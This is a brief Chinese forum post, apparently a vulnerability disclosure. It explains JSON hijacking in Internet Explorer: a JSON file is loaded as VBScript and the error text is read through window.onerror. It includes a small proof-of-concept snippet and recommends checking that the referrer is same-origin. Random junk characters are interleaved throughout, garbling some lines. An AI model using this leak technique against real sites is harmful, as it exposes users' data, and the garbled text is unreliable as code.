简要描述:
( i+ H; M4 J/ n& W9 O. z x/ b) X/ n. a& ]6 Q2 V
由于某些资源容器对数据处理不当导致json劫持漏洞.. A# E1 r; ^% `: Y, S
详细说明: x( J4 c! s. F# L
由于ie支持vbscript,所以script元素可以指定成vbscript语言:. S( F3 d) t6 F: q* b
<script language=vbscript></script>
g0 n- F; k, j% F; H2 n, ?( j
7 F# N" t7 H6 z: a7 d当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.: g3 u9 c* }, ? o. J% w0 ?" C+ d
漏洞证明:" s! f$ J9 Q# @9 z
<script>. X- T1 R+ p& M3 `
window.onerror=function(_){
& M* U: ^3 h N1 h y- J2 P, ]9 Walert(_)4 s h& P2 G+ W
}9 O2 ?) m3 n3 r7 o/ W( |1 ~ L7 C
</script>
1 `. j* t" b Q0 ^<script language=vbscript src=1.json></script>( ~$ R: K/ M5 ]$ k+ \
; {* S/ |, b% X) P
5 \5 l, Y1 D% [: {1.json:
" v8 K# t4 x: Q' d( p) m[{"name":"sogili","age":19}]; N) Q) h) [ R+ j0 W
修复方案:5 i; }+ O8 ~2 `1 C) v& r
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对